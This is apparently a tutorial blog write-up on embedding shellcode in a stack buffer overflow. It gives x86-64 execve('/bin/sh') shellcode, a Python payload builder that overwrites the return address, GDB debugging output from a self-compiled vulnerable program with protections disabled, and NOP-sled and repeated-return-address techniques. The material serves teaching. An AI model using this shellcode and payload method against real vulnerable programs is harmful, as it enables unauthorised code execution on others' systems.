Previously we saw how to overwrite the return address of stack by passing extra bytes to an unbounded buffer. But not everytime we will have a convinient function address to overwrite. The next attempt is to place the code we want to execute directly on the stack itself.
Embedding Shellcode in a Buffer Overflow
1. What is Shellcode?
- Shellcode is machine instructions (usually written in assembly) that perform some action — often spawning a shell (/bin/sh), but can be anything.
- It is called “shellcode” not because it must open a shell, but because historically it did.
2. Why embed shellcode on the stack?
- Sometimes you don’t know the address of any useful existing function.
- Or the binary doesn’t have functions like system("/bin/sh").
- In these cases, the attacker places their own code (shellcode) inside the same buffer that overflows. Then somehow point
$ripregister to the location of shellcode on stack so that CPU starts executing it.
3. Requirements for embedding shellcode
1. Executable stack
- The stack must have executable permissions.
- Many modern systems have NX (Non-Executable) protection → stack is not executable.
- CPU provides setting read, write and executable permissions at individual page level which is enforced at hardware level. This feature has been there since
80286CPU. Executing shellcode on stack will be impossible just by marking stack pages as non-executable. - For learning, we usually compile with flags
-z execstackwhich will make the stack executable.
gcc -fno-pie -no-pie -fno-stack-protector -z execstack main.c -o vuln
2. Enough space in the buffer
- Shellcode must fit entirely inside the buffer or adjacent space.
3. No null bytes
- When injecting shellcode via string functions like gets, scanf("%s"), strcpy, a null byte will terminate input.
- Shellcode must avoid 0x00, 0x0A, etc.
4. Stack-Based Shellcode Execution: A Simple Case Without ASLR
To build the payload of overflowed string we need to consider various factors, let’s understand it with a simple program:
#include<stdio.h>
void func() {
char buffer[128];
scanf("%s", buffer);
printf("buffer is %s\n", buffer);
}
int main() {
func();
}
This code contains the buffer overflow vulnerability as scanf doesn’t perform any bounds check while copying the input to buffer variable on stack.
In order to do something useful with the overflowed payload, we need to build inject machine code for a valid program that will be executed. A common goal during such attacks is to spawn a shell (advanced versions include getting root shell and reverse shells).
This is the code to spawn a shell in C
#include<stdio.h>
void main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
To see what the compiled code looks like, let’s compile it with -static flag, otherwise GCC will dynamically link the definition of execve which will be hard to extract.
$ gcc -o shellcode -ggdb -static shellcode.c
shellcode.c: In function ‘main’:
shellcode.c:7:5: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]
7 | execve(name[0], name, NULL);
| ^~~~~~
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000401865 <+0>: endbr64
0x0000000000401869 <+4>: push rbp
0x000000000040186a <+5>: mov rbp,rsp
0x000000000040186d <+8>: sub rsp,0x20
0x0000000000401871 <+12>: mov rax,QWORD PTR fs:0x28
0x000000000040187a <+21>: mov QWORD PTR [rbp-0x8],rax
0x000000000040187e <+25>: xor eax,eax
0x0000000000401880 <+27>: lea rax,[rip+0x7d789] # 0x47f010
0x0000000000401887 <+34>: mov QWORD PTR [rbp-0x20],rax
0x000000000040188b <+38>: mov QWORD PTR [rbp-0x18],0x0
0x0000000000401893 <+46>: mov rax,QWORD PTR [rbp-0x20]
0x0000000000401897 <+50>: lea rcx,[rbp-0x20]
0x000000000040189b <+54>: mov edx,0x0
0x00000000004018a0 <+59>: mov rsi,rcx
0x00000000004018a3 <+62>: mov rdi,rax
0x00000000004018a6 <+65>: call 0x4112e0 <execve>
0x00000000004018ab <+70>: nop
0x00000000004018ac <+71>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004018b0 <+75>: sub rax,QWORD PTR fs:0x28
0x00000000004018b9 <+84>: je 0x4018c0 <main+91>
0x00000000004018bb <+86>: call 0x412470 <__stack_chk_fail_local>
0x00000000004018c0 <+91>: leave
0x00000000004018c1 <+92>: ret
(gdb) disassemble __execve
Dump of assembler code for function execve:
0x00000000004112e0 <+0>: endbr64
0x00000000004112e4 <+4>: mov eax,0x3b
0x00000000004112e9 <+9>: syscall
0x00000000004112eb <+11>: cmp rax,0xfffffffffffff001
0x00000000004112f1 <+17>: jae 0x4112f4 <execve+20>
0x00000000004112f3 <+19>: ret
0x00000000004112f4 <+20>: mov rcx,0xffffffffffffffc0
0x00000000004112fb <+27>: neg eax
0x00000000004112fd <+29>: mov DWORD PTR fs:[rcx],eax
0x0000000000411300 <+32>: or rax,0xffffffffffffffff
0x0000000000411304 <+36>: ret
We have 2 options, we can write the definition of execve using syscall instruction in our shellcode or call it with call instruction. Former is preferred because otherwise we have to predict the address of execve once the program is loaded.
This is how execve is defined:
int execve(const char *pathname, char *const argv[], char *const envp[]);
execve shellcode =
1. Put "/bin/sh" somewhere in memory
2. Set RDI = pointer to "/bin/sh" (pathname)
3. Set RSI = pointer to [pointer_to_/bin/sh, NULL] (argv)
4. Set RDX = NULL (envp)
5. Set RAX = 0x3b (syscall number 59)
6. Execute syscall instruction
Based on this, we can extract only the required instructions for calling execve
; execve("/bin/sh", ["/bin/sh", NULL], NULL)
section .text
global _start
_start:
; Push "/bin/sh" onto stack (backwards because x86 is little-endian)
xor rdx, rdx ; rdx = 0 (envp = NULL)
push rdx ; Push null terminator
; Push "/bin/sh" (8 bytes) - we use "//bin/sh" to make it 8 bytes
mov rax, 0x68732f6e69622f2f ; "//bin/sh" in hex (reversed)
push rax
; Now stack has: [null][//bin/sh]
mov rdi, rsp ; rdi = pointer to "//bin/sh"
; Build argv array on stack
push rdx ; Push NULL (argv[1])
push rdi ; Push pointer to "//bin/sh" (argv[0])
mov rsi, rsp ; rsi = pointer to argv array
; Make the syscall
mov al, 0x3b ; syscall number 59 (execve)
syscall ; Execute!
Passing //bin/sh is fine here because on Unix-like systems (including Linux), multiple leading slashes are treated like a single slash for normal paths.
$ nasm -f elf64 shellcode.asm -o shellcode.o
$ objdump -d shellcode.o
shellcode.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 d2 xor %rdx,%rdx
3: 52 push %rdx
4: 48 b8 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%rax
b: 2f 73 68
e: 50 push %rax
f: 48 89 e7 mov %rsp,%rdi
12: 52 push %rdx
13: 57 push %rdi
14: 48 89 e6 mov %rsp,%rsi
17: b0 3b mov $0x3b,%al
19: 0f 05 syscall
That makes the shellcode
shellcode = (
b"\x48\x31\xd2" # xor rdx,rdx
b"\x52" # push rdx
b"\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov rax, "//bin/sh"
b"\x50" # push rax
b"\x48\x89\xe7" # mov rdi,rsp
b"\x52" # push rdx
b"\x57" # push rdi
b"\x48\x89\xe6" # mov rsi,rsp
b"\xb0\x3b" # mov al,0x3b
b"\x0f\x05" # syscall
)
Let’s run the program and inspect some of the addresses
$ gdb -q vuln
Reading symbols from vuln...
(gdb) disass func
Dump of assembler code for function func:
0x0000000000401156 <+0>: endbr64
0x000000000040115a <+4>: push rbp
0x000000000040115b <+5>: mov rbp,rsp
0x000000000040115e <+8>: add rsp,0xffffffffffffff80
0x0000000000401162 <+12>: lea rax,[rbp-0x80]
0x0000000000401166 <+16>: mov rsi,rax
0x0000000000401169 <+19>: lea rax,[rip+0xe94] # 0x402004
0x0000000000401170 <+26>: mov rdi,rax
0x0000000000401173 <+29>: mov eax,0x0
0x0000000000401178 <+34>: call 0x401060 <__isoc99_scanf@plt>
0x000000000040117d <+39>: lea rax,[rbp-0x80]
0x0000000000401181 <+43>: mov rsi,rax
0x0000000000401184 <+46>: lea rax,[rip+0xe7c] # 0x402007
0x000000000040118b <+53>: mov rdi,rax
0x000000000040118e <+56>: mov eax,0x0
0x0000000000401193 <+61>: call 0x401050 <printf@plt>
0x0000000000401198 <+66>: nop
0x0000000000401199 <+67>: leave
0x000000000040119a <+68>: ret
End of assembler dump.
(gdb) b *0x0000000000401178
Breakpoint 1 at 0x401178: file main.c, line 7.
(gdb) b *0x000000000040119a
Breakpoint 2 at 0x40119a: file main.c, line 10.
I have placed 2 breakpoints, one just before the buffe roverflow happens, another just before the function returns
Breakpoint 1, 0x0000000000401178 in func () at main.c:7
7 scanf("%s", buffer);
(gdb) p $rbp
$1 = (void *) 0x7fffffffde50
(gdb) p &buffer
$2 = (char (*)[128]) 0x7fffffffddd0
(gdb) x/25bx &buffer
0x7fffffffddd0: 0x00 0x80 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffddd8: 0x00 0x00 0x60 0x00 0x00 0x00 0x00 0x00
0x7fffffffdde0: 0x00 0x00 0x60 0x00 0x00 0x00 0x00 0x00
0x7fffffffdde8: 0x00
We can see the address of buffer is at 0x7fffffffddd0 which is where we are going to place the shellcode.
We can write a python script to build and format the shellcode
#!/usr/bin/env python3
import sys
shellcode = b"\x48\x31\xd2\x52\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
payload = shellcode
payload += b"A" * (128 - len(shellcode)) # exact padding
payload += b"BBBBBBBB" # saved RBP (junk)
payload += (0x7fffffffddd0).to_bytes(8, "little") # return into shellcode
sys.stdout.buffer.write(payload)
Since GDB disables ASLR, the address of buffer is going to remain same, so i had restarted the program in GDB using
(gdb) run < payload.bin
Now we can verify the shellcode is overwritten properly at the address of the buffer
(gdb) c
Continuing.
buffer is H1�RH�//bin/shPH��RWH��;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB�����
Breakpoint 2, 0x000000000040119a in func () at main.c:10
10 }
(gdb) x/25bx &buffer
0x7fffffffddd0: 0x48 0x31 0xd2 0x52 0x48 0xb8 0x2f 0x2f
0x7fffffffddd8: 0x62 0x69 0x6e 0x2f 0x73 0x68 0x50 0x48
0x7fffffffdde0: 0x89 0xe7 0x52 0x57 0x48 0x89 0xe6 0xb0
0x7fffffffdde8: 0x3b
(gdb) x/25ib &buffer
0x7fffffffddd0: xor rdx,rdx
0x7fffffffddd3: push rdx
0x7fffffffddd4: movabs rax,0x68732f6e69622f2f
0x7fffffffddde: push rax
0x7fffffffdddf: mov rdi,rsp
0x7fffffffdde2: push rdx
0x7fffffffdde3: push rdi
0x7fffffffdde4: mov rsi,rsp
0x7fffffffdde7: mov al,0x3b
0x7fffffffdde9: syscall
0x7fffffffddeb: rex.B
0x7fffffffddec: rex.B
0x7fffffffdded: rex.B
0x7fffffffddee: rex.B
0x7fffffffddef: rex.B
0x7fffffffddf0: rex.B
0x7fffffffddf1: rex.B
0x7fffffffddf2: rex.B
0x7fffffffddf3: rex.B
0x7fffffffddf4: rex.B
0x7fffffffddf5: rex.B
0x7fffffffddf6: rex.B
0x7fffffffddf7: rex.B
0x7fffffffddf8: rex.B
0x7fffffffddf9: rex.B
We can see the $rip has actually started executing the shellcode
Breakpoint 2, 0x000000000040119a in func () at main.c:10
10 }
(gdb) ni
0x00007fffffffddd0 in ?? ()
(gdb) x/25ib $rip
=> 0x7fffffffddd0: xor rdx,rdx
0x7fffffffddd3: push rdx
0x7fffffffddd4: movabs rax,0x68732f6e69622f2f
0x7fffffffddde: push rax
0x7fffffffdddf: mov rdi,rsp
0x7fffffffdde2: push rdx
0x7fffffffdde3: push rdi
0x7fffffffdde4: mov rsi,rsp
0x7fffffffdde7: mov al,0x3b
0x7fffffffdde9: syscall
0x7fffffffddeb: rex.B
0x7fffffffddec: rex.B
0x7fffffffdded: rex.B
0x7fffffffddee: rex.B
0x7fffffffddef: rex.B
0x7fffffffddf0: rex.B
0x7fffffffddf1: rex.B
0x7fffffffddf2: rex.B
0x7fffffffddf3: rex.B
0x7fffffffddf4: rex.B
0x7fffffffddf5: rex.B
0x7fffffffddf6: rex.B
0x7fffffffddf7: rex.B
0x7fffffffddf8: rex.B
0x7fffffffddf9: rex.B
This actually resulted in a weird behaviour where GDB jumps from 0x00007fffffffdde3 to 0x00007fffffffddeb directly, showing syscall was possibly skipped. But the value of $rax being -38 shows its a valid error code, ENOSYS (Function not implemented).
0x00007fffffffddd4 in ?? ()
(gdb) ni
0x00007fffffffddde in ?? ()
(gdb) p $rax
$9 = 7526411553527181103
(gdb) ni
Warning:
Cannot insert breakpoint 0.
Cannot access memory at address 0x68732f6e69622f2f
0x00007fffffffdddf in ?? ()
(gdb) p $rax
$10 = 7526411553527181103
(gdb) ni
0x00007fffffffdde2 in ?? ()
(gdb) ni
Warning:
Cannot insert breakpoint 0.
Cannot access memory at address 0x0
0x00007fffffffdde3 in ?? ()
(gdb) ni
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffddeb in ?? ()
(gdb) p $rsi
$11 = 140737488346688
(gdb) p $rdi
$12 = 140737488346704
(gdb) p $rdx
$13 = 0
(gdb) ni
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
It turns out we are not passing the actual syscall number 58 in $rax.
0x7fffffffddd4: movabs rax,0x68732f6e69622f2f ← RAX gets "//bin/sh"
0x7fffffffddde: push rax
0x7fffffffdddf: mov rdi,rsp
0x7fffffffdde2: push rdx
0x7fffffffdde3: push rdi
0x7fffffffdde4: mov rsi,rsp
0x7fffffffdde7: mov al,0x3b ← Only sets AL (low byte), not full RAX!
0x7fffffffdde9: syscall
Instead now we use
mov rax, 59 # Just set the whole register directly
This shows the exploit worked
(gdb) x/25ib 0x7fffffffddd0
0x7fffffffddd0: xor rdx,rdx
0x7fffffffddd3: push rdx
0x7fffffffddd4: movabs rbx,0x68732f6e69622f2f
0x7fffffffddde: push rbx
0x7fffffffdddf: mov rdi,rsp
0x7fffffffdde2: push rdx
0x7fffffffdde3: push rdi
0x7fffffffdde4: mov rsi,rsp
0x7fffffffdde7: mov rax,0x3b
0x7fffffffddee: syscall
0x7fffffffddf0: rex.B
0x7fffffffddf1: rex.B
0x7fffffffddf2: rex.B
0x7fffffffddf3: rex.B
0x7fffffffddf4: rex.B
0x7fffffffddf5: rex.B
0x7fffffffddf6: rex.B
0x7fffffffddf7: rex.B
0x7fffffffddf8: rex.B
0x7fffffffddf9: rex.B
0x7fffffffddfa: rex.B
0x7fffffffddfb: rex.B
0x7fffffffddfc: rex.B
0x7fffffffddfd: rex.B
0x7fffffffddfe: rex.B
(gdb) c
Continuing.
process 4012 is executing new program: /usr/bin/dash
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x401178
Cannot insert breakpoint 2.
Cannot access memory at address 0x40119a
Outside of GDB
$ ./vuln < payload.bin
buffer is at 0x7fffffffded0
buffer is H1�RH�//bin/shSH��RWH��H��;
$ ./vuln < payload.bin
buffer is at 0x7fffffffded0
buffer is H1�RH�//bin/shSH��RWH��H��;
$ (cat payload.bin; cat) | ./vuln
buffer is at 0x7fffffffded0
ls
buffer is H1�RH�//bin/shSH��RWH��H��;
ls
a.out main.c payload.bin payload.py payload2.py payload3.py shellcode shellcode.asm shellcode.c shellcode.o trace.txt vuln
ls
a.out main.c payload.bin payload.py payload2.py payload3.py shellcode shellcode.asm shellcode.c shellcode.o trace.txt vuln
pwd
/home/sanketh/assembly/vuln/buffer_overflow/stack_based_buffer_overflow/smashing_stack_for_fun_and_profit/exploit3
whoami
sanketh
Why Terminal Stayed Open in Second Method?
Method 1: ./vuln < payload.bin (Shell Closes Immediately)
./vuln < payload.bin
Shell spawns but exits immediately
What happens:
payload.binis redirected to stdinvulnreads the payload, gets exploited- Shellcode executes and spawns
/bin/sh - The shell (
/bin/sh) tries to read from stdin - But stdin is connected to the file
payload.bin, which has reached EOF (end of file) - Shell reads EOF → interprets this as “no more input” → exits immediately
- You never get a chance to interact with it
Method 2: (cat payload.bin; cat) | ./vuln (Shell Stays Open)
(cat payload.bin; cat) | ./vuln
# Shell spawns AND stays open for interaction
What happens:
- The subshell
(cat payload.bin; cat)runs TWO commands in sequence:cat payload.bin- outputs the exploit payloadcat(no arguments) - waits and reads from YOUR keyboard (stdin)
- Both outputs are piped to
./vuln’s stdin vulnreads the payload, gets exploited- Shellcode spawns
/bin/sh - The shell tries to read from stdin
- stdin is still connected to the pipe, and the second
catis waiting for YOUR input - When you type commands, they go:
keyboard → cat → pipe → /bin/sh → output - Shell stays open until you press
Ctrl+D(EOF) orexit
5. Improving Reliability with NOP Sleds - No ASLR
In our previous program, we handcrafted the payload so that the return address directly lands on our shellcode. Of course, this was possible only because we disabled ASLR, which means the location of the stack will be the same every time we run the program. But even with that, we had to align our shellcode at byte-level precision—a single miscalculation in the jump address will prevent the shellcode from executing and crash the program without any success.
One way to increase the chances of successful shellcode execution is to place the shellcode at the end of the overflowed buffer and pad the bytes in front with the machine code for the NOP instruction (0x90 on x86-64). NOP simply means “no operation”—a blank instruction used in CPUs for various purposes like pipeline alignment and timing. When executed, the CPU doesn’t need to do any work; it simply moves to the next instruction. This can be used to our advantage: landing anywhere in the NOP region (called a “NOP sled” or “NOP slide”) means we will eventually “slide down” to our shellcode, so we can afford some margin of error in the calculation of the jump address.
$ hexdump C payload_32.bin
hexdump: C: No such file or directory
0000000 9090 9090 9090 9090 9090 9090 9090 9090
*
0000040 3148 52d2 bb48 2f2f 6962 2f6e 6873 4853
0000050 e789 5752 8948 48e6 c0c7 003b 0000 050f
0000060 4141 4141 4141 4141 4141 4141 4141 4141
*
0000080 4242 4242 4242 4242 def0 ffff 7fff 0000
0000090
We can see the return address here is 32 bytes away from the original jump address, but we can execute the shellcode
$ (cat payload_32.bin; cat) | ./vuln
buffer is at 0x7fffffffded0
ls
buffer is ����������������������������������������������������������������H1�RH�//bin/shSH��RWH��H��;
ls
a.out main.c payload.py payload3.py payload_0.bin payload_60.bin shellcode.asm shellcode.o vuln
exploit_nop.py payload.bin payload2.py payload4.py payload_32.bin shellcode shellcode.c trace.txt
ls
a.out main.c payload.py payload3.py payload_0.bin payload_60.bin shellcode.asm shellcode.o vuln
exploit_nop.py payload.bin payload2.py payload4.py payload_32.bin shellcode shellcode.c trace.txt
whoami
sanketh
Another way to icnrease the chances is not just to add return address at the end, but to keep repeating it for few times. This way even if we miss to voerwrite the exact address, if the alignment is correct it will work.
Repeating the Return Address
Another technique to increase exploitation success is to repeat the return address multiple times at the end of the payload, rather than writing it just once.
Why this works:
When overwriting the stack, you might not hit the exact location of the saved return address due to:
- Uncertainty about the precise buffer size
- Compiler padding/alignment
- Stack frame layout variations
By repeating the return address many times, you create a larger “target zone”:
Buffer layout:
[NOP sled][Shellcode][Padding][ret][ret][ret][ret][ret][ret][ret]...
└─────────────┬────────────────┘
Any of these will work!